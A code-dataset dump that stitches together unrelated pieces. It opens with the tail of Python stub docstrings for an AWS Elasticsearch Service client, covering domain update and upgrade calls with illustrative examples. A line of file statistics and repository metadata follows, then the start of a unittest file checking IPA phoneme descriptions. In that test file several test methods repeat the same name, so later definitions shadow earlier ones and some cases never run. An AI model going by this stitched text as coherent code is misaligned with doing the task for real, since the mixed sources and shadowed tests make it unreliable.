Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **Status** *(dict) --*
Specifies the status of the Cognito options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the ``EncryptionAtRestOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the Encryption At Rest options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **Status** *(dict) --*
Specifies the status of the Encryption At Rest options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the ``NodeToNodeEncryptionOptions`` for the Elasticsearch domain.
- **Options** *(dict) --*
Specifies the node-to-node encryption options for the specified Elasticsearch domain.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **Status** *(dict) --*
Specifies the status of the node-to-node encryption options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **AdvancedOptions** *(dict) --*
Specifies the ``AdvancedOptions`` for the domain. See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- **Options** *(dict) --*
Specifies the status of advanced options for the specified Elasticsearch domain.
- *(string) --*
- *(string) --*
- **Status** *(dict) --*
Specifies the status of ``OptionStatus`` for advanced options for the specified Elasticsearch domain.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- **Options** *(dict) --*
The log publishing options configured for the Elasticsearch domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled or not.
- **Status** *(dict) --*
The status of the log publishing options for the Elasticsearch domain. See ``OptionStatus`` for the status information that's included.
- **CreationDate** *(datetime) --*
Timestamp which tells the creation date for the entity.
- **UpdateDate** *(datetime) --*
Timestamp which tells the last updated time for the entity.
- **UpdateVersion** *(integer) --*
Specifies the latest version for the entity.
- **State** *(string) --*
Provides the ``OptionState`` for the Elasticsearch domain.
- **PendingDeletion** *(boolean) --*
Indicates whether the Elasticsearch domain is being deleted.
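**Example (illustrative)**
A hedged sketch of reading one of the nested option statuses above; ``response`` names the dict returned by the call, and the ``'Processing'`` comparison uses the ``State`` values shown in the response syntax::
version_state = response['DomainConfig']['ElasticsearchVersion']['Status']['State']
print('version change still being applied' if version_state == 'Processing' else version_state)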
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you are updating.
:type ElasticsearchClusterConfig: dict
:param ElasticsearchClusterConfig:
The type and number of instances to instantiate for the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
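A hedged illustration of this structure (instance type and counts are examples only; the zone count matches the number of subnets a two-zone VPC domain would use)::
ElasticsearchClusterConfig={
'InstanceType': 'r4.large.elasticsearch',
'InstanceCount': 2,
'ZoneAwarenessEnabled': True,
'ZoneAwarenessConfig': {'AvailabilityZoneCount': 2}
}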
:type EBSOptions: dict
:param EBSOptions:
Specify the type and size of the EBS volume that you want to use.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
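A hedged illustration (the size is an example only; ``Iops`` would apply only to the ``io1`` volume type)::
EBSOptions={'EBSEnabled': True, 'VolumeType': 'gp2', 'VolumeSize': 10}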
:type SnapshotOptions: dict
:param SnapshotOptions:
Option to set the time, in UTC format, for the daily automated snapshot. Default value is ``0`` hours.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
:type VPCOptions: dict
:param VPCOptions:
Options to specify the subnets and security groups for the VPC endpoint. For more information, see `Creating a VPC <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-creating-vpc>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains*.
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
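A hedged illustration (the subnet and security group IDs are placeholders)::
VPCOptions={'SubnetIds': ['subnet-0123456789abcdef0'], 'SecurityGroupIds': ['sg-0123456789abcdef0']}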
:type CognitoOptions: dict
:param CognitoOptions:
Options to specify the Cognito user and identity pools for Kibana authentication. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
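A hedged illustration (the pool IDs and role ARN are placeholders)::
CognitoOptions={'Enabled': True, 'UserPoolId': 'us-east-1_xxxxxxxxx', 'IdentityPoolId': 'us-east-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx', 'RoleArn': 'arn:aws:iam::123456789012:role/CognitoAccessForAmazonES'}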
:type AdvancedOptions: dict
:param AdvancedOptions:
Modifies the advanced option to allow references to indices in an HTTP request body. Must be ``false`` when configuring access to individual sub-resources. By default, the value is ``true``. See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- *(string) --*
- *(string) --*
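A hedged illustration of the key/value map described above (the key name follows the underlying Elasticsearch REST setting; confirm it against the linked guide)::
AdvancedOptions={'rest.action.multi.allow_explicit_index': 'false'}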
:type AccessPolicies: string
:param AccessPolicies:
IAM access policy as a JSON-formatted string.
:type LogPublishingOptions: dict
:param LogPublishingOptions:
Map of ``LogType`` and ``LogPublishingOption`` , each containing options to publish a given type of Elasticsearch log.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled or not.
:rtype: dict
:returns:
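**Example (illustrative)**
A hedged usage sketch; ``client`` is assumed to be a configured Elasticsearch Service client, and the domain name, instance settings, and log group ARN are placeholders::
response = client.update_elasticsearch_domain(
DomainName='my-domain',
ElasticsearchClusterConfig={'InstanceType': 'r4.large.elasticsearch', 'InstanceCount': 2},
SnapshotOptions={'AutomatedSnapshotStartHour': 3},
LogPublishingOptions={'SEARCH_SLOW_LOGS': {'CloudWatchLogsLogGroupArn': 'arn:aws:logs:us-east-1:123456789012:log-group:my-domain-search-slow-logs', 'Enabled': True}}
)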
"""
pass
def upgrade_elasticsearch_domain(self, DomainName: str, TargetVersion: str, PerformCheckOnly: bool = None) -> Dict:
"""
Allows you to either upgrade your domain to a compatible Elasticsearch version or perform an upgrade eligibility check.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/UpgradeElasticsearchDomain>`_
**Request Syntax**
::
response = client.upgrade_elasticsearch_domain(
DomainName='string',
TargetVersion='string',
PerformCheckOnly=True|False
)
**Response Syntax**
::
{
'DomainName': 'string',
'TargetVersion': 'string',
'PerformCheckOnly': True|False
}
**Response Structure**
- *(dict) --*
Container for the response returned by the ``UpgradeElasticsearchDomain`` operation.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **TargetVersion** *(string) --*
The version of Elasticsearch that you intend to upgrade the domain to.
- **PerformCheckOnly** *(boolean) --*
This flag, when set to True, indicates that an upgrade eligibility check needs to be performed. The check does not actually perform the upgrade.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type TargetVersion: string
:param TargetVersion: **[REQUIRED]**
The version of Elasticsearch that you intend to upgrade the domain to.
:type PerformCheckOnly: boolean
:param PerformCheckOnly:
This flag, when set to True, indicates that an upgrade eligibility check needs to be performed. The check does not actually perform the upgrade.
:rtype: dict
:returns:
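**Example (illustrative)**
A hedged usage sketch; run the eligibility check first, then the actual upgrade (the domain name and target version are placeholders)::
check = client.upgrade_elasticsearch_domain(DomainName='my-domain', TargetVersion='6.8', PerformCheckOnly=True)
upgrade = client.upgrade_elasticsearch_domain(DomainName='my-domain', TargetVersion='6.8')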
"""
pass
| 67.173052 | 1,110 | 0.564676 | 18,159 | 203,400 | 6.304367 | 0.042018 | 0.011425 | 0.020947 | 0.010203 | 0.891144 | 0.873569 | 0.860466 | 0.8507 | 0.837266 | 0.828557 | 0 | 0.01629 | 0.333628 | 203,400 | 3,027 | 1,111 | 67.195243 | 0.828339 | 0.865501 | 0 | 0.435484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.435484 | false | 0.435484 | 0.112903 | 0 | 0.564516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
311ac4d625133f9955913ad8594042a797912b6c | 671,979 | py | Python | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | ["MIT"] | null | null | null | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | ["MIT"] | 3 | 2020-10-15T15:33:25.000Z | 2021-02-18T21:43:49.000Z | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | ["MIT"] | null | null | null | """
Unit tests for describing a phoneme given its
representation in the International Phonetic Alphabet.
Note to software developer:
The code in this module was generated from SpecGeneratorForPython.hs,
a file in the Haskell project.
"""
import unittest
from ipa import describe_transcription
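# A hedged, illustrative addition (not produced by the Haskell generator
# mentioned above): the repetitive per-symbol methods below could equally be
# written table-driven with unittest's subTest. The expected strings are
# copied from the generated tests that follow.
class IPATextToDescriptionTableDrivenExample(unittest.TestCase):
    def test_describe_transcription_examples(self):
        cases = [
            ("p", "voiceless bilabial plosive pulmonic egressive consonant"),
            ("b", "voiced bilabial plosive pulmonic egressive consonant"),
            ("t", "voiceless alveolar plosive pulmonic egressive consonant"),
            ("d", "voiced alveolar plosive pulmonic egressive consonant"),
        ]
        for transcription, expected in cases:
            with self.subTest(transcription=transcription):
                self.assertEqual(describe_transcription(transcription), expected)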
class IPATextToDescription(unittest.TestCase):
# voiceless bilabial plosive pulmonic egressive consonant
def test_p_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p")
self.assertEqual(actual, expected)
def test_p̊_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊")
self.assertEqual(actual, expected)
def test_p̥_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥")
self.assertEqual(actual, expected)
def test_b̊_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊")
self.assertEqual(actual, expected)
def test_b̥_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial plosive pulmonic egressive consonant
def test_pʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʷ")
self.assertEqual(actual, expected)
def test_p̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ʷ")
self.assertEqual(actual, expected)
def test_p̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ʷ")
self.assertEqual(actual, expected)
def test_b̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʷ")
self.assertEqual(actual, expected)
def test_b̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial plosive pulmonic egressive consonant
def test_pʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʲ")
self.assertEqual(actual, expected)
def test_p̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ʲ")
self.assertEqual(actual, expected)
def test_p̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ʲ")
self.assertEqual(actual, expected)
def test_b̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʲ")
self.assertEqual(actual, expected)
def test_b̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial plosive pulmonic egressive consonant
def test_pˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pˠ")
self.assertEqual(actual, expected)
def test_p̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ˠ")
self.assertEqual(actual, expected)
def test_p̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ˠ")
self.assertEqual(actual, expected)
def test_b̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ˠ")
self.assertEqual(actual, expected)
def test_b̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial plosive pulmonic egressive consonant
def test_pˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pˤ")
self.assertEqual(actual, expected)
def test_p̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ˤ")
self.assertEqual(actual, expected)
def test_p̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ˤ")
self.assertEqual(actual, expected)
def test_b̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ˤ")
self.assertEqual(actual, expected)
def test_b̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial plosive pulmonic egressive consonant
def test_pʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰ")
self.assertEqual(actual, expected)
def test_b̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰ")
self.assertEqual(actual, expected)
def test_b̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial plosive pulmonic egressive consonant
def test_pʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰʷ")
self.assertEqual(actual, expected)
def test_b̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰʷ")
self.assertEqual(actual, expected)
def test_b̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant
def test_pʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰʲ")
self.assertEqual(actual, expected)
def test_b̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰʲ")
self.assertEqual(actual, expected)
def test_b̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial plosive pulmonic egressive consonant
def test_pʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰˠ")
self.assertEqual(actual, expected)
def test_b̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰˠ")
self.assertEqual(actual, expected)
def test_b̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant
def test_pʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰˤ")
self.assertEqual(actual, expected)
def test_b̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰˤ")
self.assertEqual(actual, expected)
def test_b̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial plosive pulmonic egressive consonant
def test_b_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b")
self.assertEqual(actual, expected)
def test_p̬_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬")
self.assertEqual(actual, expected)
def test_p̬_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬")
self.assertEqual(actual, expected)
# voiced labialized bilabial plosive pulmonic egressive consonant
def test_bʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʷ")
self.assertEqual(actual, expected)
def test_p̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʷ")
self.assertEqual(actual, expected)
def test_p̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial plosive pulmonic egressive consonant
def test_bʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʲ")
self.assertEqual(actual, expected)
def test_p̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʲ")
self.assertEqual(actual, expected)
def test_p̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial plosive pulmonic egressive consonant
def test_bˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bˠ")
self.assertEqual(actual, expected)
def test_p̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˠ")
self.assertEqual(actual, expected)
def test_p̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial plosive pulmonic egressive consonant
def test_bˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bˤ")
self.assertEqual(actual, expected)
def test_p̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˤ")
self.assertEqual(actual, expected)
def test_p̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial plosive pulmonic egressive consonant
def test_bʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰ")
self.assertEqual(actual, expected)
def test_b̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰ")
self.assertEqual(actual, expected)
def test_p̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰ")
self.assertEqual(actual, expected)
